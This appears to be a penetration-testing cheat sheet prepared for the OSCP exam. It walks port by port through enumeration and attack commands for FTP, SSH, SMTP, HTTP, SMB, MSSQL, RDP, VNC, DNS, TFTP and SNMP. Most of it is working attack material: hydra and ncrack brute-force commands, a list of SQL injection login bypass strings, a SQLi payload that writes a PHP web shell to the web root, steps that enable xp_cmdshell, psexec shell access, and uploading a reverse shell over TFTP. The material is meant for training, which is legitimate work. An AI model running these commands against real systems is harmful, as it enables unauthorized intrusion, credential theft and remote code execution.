OSCP
Search…
Netwerk enum - Ports
A quick checklist for possible attack vectors through the different ports

TCP

21 - FTP

Checks

  • Check if you have anonymous access
  • Check if you can upload a file to trigger a webshell through the webapp
  • Check if you can download backup files to extract included passwords
  • Check the version of FTP for exploits

Commands

Login to ftp server (for anonymous access, use "anonymous":"anonymous")
1
ftp $ip
Copied!
FTP specific nmap scan
1
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Copied!
Tip: Before starting scans, set a bash variable to the IP address you are scanning likeip=10.11.1.1.Then the $ip value in the commands of this cheat sheet will be filled in automatically.

22 - SSH

Checks

  • Try easy username-password combinations
  • Check for username enumeration vulnerabilities
  • Check version for vulnerabilities
  • (Only when getting desperate) Try brute force with Hydra, Medussa, ...

Commands

Nmap scan
1
nmap -p 22000 -sV -Pn -T4 --script=ssh* $ip
Copied!
Brute force
1
hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
2
hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh
Copied!
Connect through found key
1
#make key only accessible by the current user
2
chmod 0600 private.key
3
ssh [email protected]$ip -i user.key
Copied!

25 - SMTP

Checks

  • Check for user enumeration
  • Check version for exploits

Commands

nmap scan
1
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
Copied!
user enumeration
1
#manual way
2
nc -nvv $ip 25
3
VRFY root
4
(exists if user is replied as "250 Georgia<[email protected]>")
5
(doesn't exist if user is replied as "551 user not local")
6
7
#automated way
8
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
Copied!

80/443 - HTTP(S)

Checks
  • Login portals
    • try the default credentials off the application
    • try usernames already seen throughout the application or in other services like SMTP
    • try SQL injection bypasses
    • try registering a new user
    • brute force with hydra, medusa, ...
  • Check robots.txt for hidden directories
  • Brute force directories to find hidden content
  • Check for passwords/URLs/versions/... in comments of web app
  • Check version numbers for known exploits
    • Check changelog for version information
    • Estimate version based on copyright date (if not automatically adjusted)
  • Check if specific CMS is used like WordPress and then use platform specific scanners
  • ways to RCE
    • check for file upload functionalities (if uploads are filtered, try alternative extensions)
    • execute commands through SQLi
    • Shellshock
    • command injection
    • trigger injected code through path traversal
Enumeration scans
Directory brute force
1
#start of with general scan
2
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50
3
#add extensions
4
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500"
Copied!
nmap scan
1
nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip
Copied!
webdav scanning
1
davtest --url http://$ip
2
davtest -move -sendbd auto -url http://$ip:8080/webdav/
3
cadaver http://$ip:8080/webdav/
Copied!
Nikto scans
1
nikto -host $ip | tee nikto.log
Copied!
Login portals
brute force login portals
1
#basic auth
2
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
3
#login form
4
hydra -L users.txt -P users.txt $ip http-post-form "<directory>:login_username=^USER^&secretkey=^PASS^&<rest of post request>:<error message>"
5
#create custom password list
6
cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl
Copied!
Standard credentials you should try when being blocked by login portal
1
admin:admin
2
admin:password
3
admin:administrator
4
admin:(name of box)
5
user:user
6
user:password
7
user:12345
8
guest:guest
9
root:root
10
(name of box):(name of box)
11
(default account):(name of application)
Copied!
Try SQL injections to bypass the login form
1
' or 1=1;--
2
' or '1'='1
3
' or 1=1;#
4
') or ('x'='x
5
' or <column> like '%';--
6
' or 1=1 LIMIT 1;--
7
admin' --
8
admin' #
9
admin'/*
10
' or 1=1--
11
' or 1=1#
12
' or 1=1/*
13
') or '1'='1--
14
') or ('1'='1
15
' or 1/*
16
*/ =1 --
17
admin' or 'a'='a
18
'#
Copied!

File upload

Try alternative extensions for file uploads
1
Php > upload as pHp / phP / test.php.jpg /
2
php - phtml, .php, .php3, .php4, .php5, and .inc
3
asp - asp, .aspx
4
perl - .pl, .pm, .cgi, .lib
5
jsp - .jsp, .jspx, .jsw, .jsv, and .jspf
6
Coldfusion - .cfm, .cfml, .cfc, .dbm
Copied!

File traversal list

Path Traversal Cheat Sheet: Windows | GracefulSecurity
GracefulSecurity |

RCE through SQLi

1
#Through file creation
2
union all select "<?php echo shell_exec($_GET['cmd']);?>",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
3
#if running as database admin, use xp_cmdshell
4
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
5
'; exec master.dbo.xp_cmdshell 'command'
6
7
#On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
8
EXEC sp_configure 'show advanced options', 1;--
9
RECONFIGURE;--
10
EXEC sp_configure 'xp_cmdshell', 1;--
11
RECONFIGURE;--
12
13
#On MSSQL 2000:
14
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
Copied!
If you use exploits for web apps but they don't work as expected: proxy network traffic through burp and see the sent requests

110 - POP3

Checks
  • Check version for exploits
  • Check mails for the presence of credentials
Commands
manually login to the application
1
#connect and check for banner
2
telnet $ip 110
3
#guess login credentials
4
USER pelle
5
PASS admin
6
#list all emails
7
list
8
#retrieve email number 5 for example
9
retr 5
Copied!

111 - NFS/RPC

Checks
  • Check for passwords in files on mountable drives
Commands
1
#check general rpc info
2
rpcinfo $ip
3
4
#Check what shares you can mount
5
showmount -e $ip
6
7
#mounting the share
8
#make the directory
9
mkdir /mnt/share
10
#mount the share
11
mount -t nfs $ip:/share /mnt/share -nolock
Copied!
Keep mountable shares in mind as they might be used in root squashing attacks to elevate your privileges to root.

139/445 - SMB

Checks
  • Check for null sessions
  • Check the permissions of users you already have
  • Check for passwords in files
  • Attempt brute force on enumerated users
  • Check for EternalBlue
  • Check samba version (if Linux)
Commands (Automated)
nmap scan
1
#general scan
2
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445
3
4
#vulnerability scan
5
nmap --script smb-vuln* -p 445 -oA nmap_smb_vulns $ip
Copied!
Check samba versions
1
#save code below as samba_version.sh and make it executable
2
./samba_version.sh
3
if [ -z $1 ]; then echo "Usage: ./samba_version.sh RHOST {RPORT}" && exit; else rhost=$1; fi
4
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
5
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$"
6
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
7
sleep 0.5 && echo ""
Copied!
enum4linux
1
enum4linux -a $ip
Copied!
smbmap
1
#list general folders
2
smbmap -H $ip
3
4
#recursively list dirs and files
5
smbmap -R $sharename -H $ip
6
smbmap -R "Users" -H $ip -u Guest
7
8
#download a file
9
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
Copied!
CrackMapExec
1
#check if you can connect through null sessions (check what rights you have on the shares)
2
cme smb $ip -u '' -p '' --shares
3
cme smb $ip -u '' -p '' --shares --port 139
4
5
#enumerate the users
6
#rid brute forcing
7
cme smb $ip -u "" -p "" --rid-brute
8
#active sessions
9
cme smb $ip -u '' -p '' --loggedon-users
10
#users in general
11
cme smb $ip -u '' -p '' --users
12
13
#enumerate the groups
14
#local groups
15
cme smb $ip -u '' -p '' --local-groups
16
#domain groups
17
cme smb $ip -u '' -p '' --groups
18
19
#check for the password policy
20
cme smb $ip -u "" -p "" --pass-pol
Copied!
mount shares and inspect files manually
1
#smbclient
2
smbclient -L $ip
3
smbclient //$ip/tmp
4
smbclient \\\\192.168.1.105\\ipc$ -U john
5
smbclient //$ip/ipc$ -U john
6
7
#mounting the share
8
mkdir /mnt/targetshare
9
mount -t cifs \\172.16.20.88\ipc$ -o username=[username] /mnt/targetshare
Copied!
brute force smb
1
hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f
2
#in OSCP the passwords are often equal to the username
3
hydra -L usernames.txt -P usernames.txt $ip smb -V -f
Copied!
Gaining shell through psexec (user needs to be admin)
1
#copy script
2
cp /usr/share/doc/python-impacket/examples/psexec.py .
3
4
#specific command test
5
python psexec.py <username>:<pass>@10.11.1.227 whoami
6
7
#shell
8
rlwrap python psexec.py <username>:<pass>@10.11.1.227
9
10
#NOTE: be carefull with exclamation marks in passwords: rottenadmin:[email protected]\[email protected]
11
12
#through crackmapexec (didn't always work for me)
13
cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami
Copied!

1433 - MSSQL

Checks
  • Try default credentials "sa:password"
  • Brute force creds
  • Check database content for new passwords
  • Check version for exploits
  • RCE
    • through xp_cmdshell functionality
    • through injecting payload in output file, placing it in webroot and triggering it through webapp
Commands
nmap
1
nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -o 1433_nmap_mssql
Copied!
credential brute force
1
nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip
Copied!
manually logging in and gaining shell
1
#login
2
sqsh -S $ip -U sa -P password
3
sqsh -S $ip:27900 -U sa -P password
4
5
#execute commands
6
xp_cmdshell 'date'
7
go
Copied!

3306 - MySQL

Checks
  • Try default credentials "root":""
  • Brute force credentials
  • Check database content for new passwords
  • Check version for exploits
Commands
nmap
1
nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -o 3306_nmap_mysql $ip
Copied!
try default password
1
mysql --host=$ip -u root -p
Copied!

3389 - RDP

Checks
  • Check if you can login with default guest account and blank password
  • Check if you can brute force users
  • Check for BlueKeep
Commands
nmap
1
nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -o 3389_nmap_rdp
Copied!
manually login
1
rdesktop $ip
2
3
#Try default guest account "guest":""
4
rdesktop -u guest $ip -g 94%
Copied!
Start brute force
1
ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
2
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip
Copied!

5900 - VNC

Checks
  • check for easy VNC passwords
  • check for exploits for VNC version
  • brute force VNC password
Commands
nmap
1
nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC
Copied!
VNC brute force on base password
1
hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc
Copied!

UDP

53 - DNS

Checks
  • Try zone transfer
  • Brute force subdomains
Commands
do DNS lookup specifying the DNS server
1
nslookup
2
#set nameserver to ip of box
3
> server 10.10.10.13
4
#ask for dns of box ip address
5
> 10.10.10.13
Copied!
subdomain enumeration / brute force
1
dig axfr @$ip test.htb
2
fierce -dns ext.recon.lan -dnsserver 172.16.90.53
3
gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
Copied!

69 - TFTP

Checks
  • search for files to find sensitive info like passwords
  • upload shells to trigger them in web app
Commands
nmap
1
nmap -sU -p 69 --script tftp-enum.nse $ip
Copied!
Interact with TFTP protocol
1
#setup the connection
2
tftp 172.16.200.100
3
#get a file
4
tftp> get /etc/passwd
5
#upload reverse shell
6
tftp> put shell.php
Copied!
automated search sensitive files (Metasploit)
1
msfconsole
2
use tftpbrute
3
set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
Copied!

161 - SNMP

Checks
  • Try the default community strings 'public' and 'private'
  • Enumerate version of OS/ users /processes
Commands
nmap
1
nmap -sU -p161 --script "snmp-*" $ip
Copied!
scan range of ip addresses for snmp strings
1
#only try "public" and "private"
2
onesixtyone -i targets.list
3
4
#try 100+ community strings
5
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip
Copied!
enumerate information with known community string
1
# enumerate windows users
2
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
3
# enumerates running processes
4
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2
Copied!
Last modified 1yr ago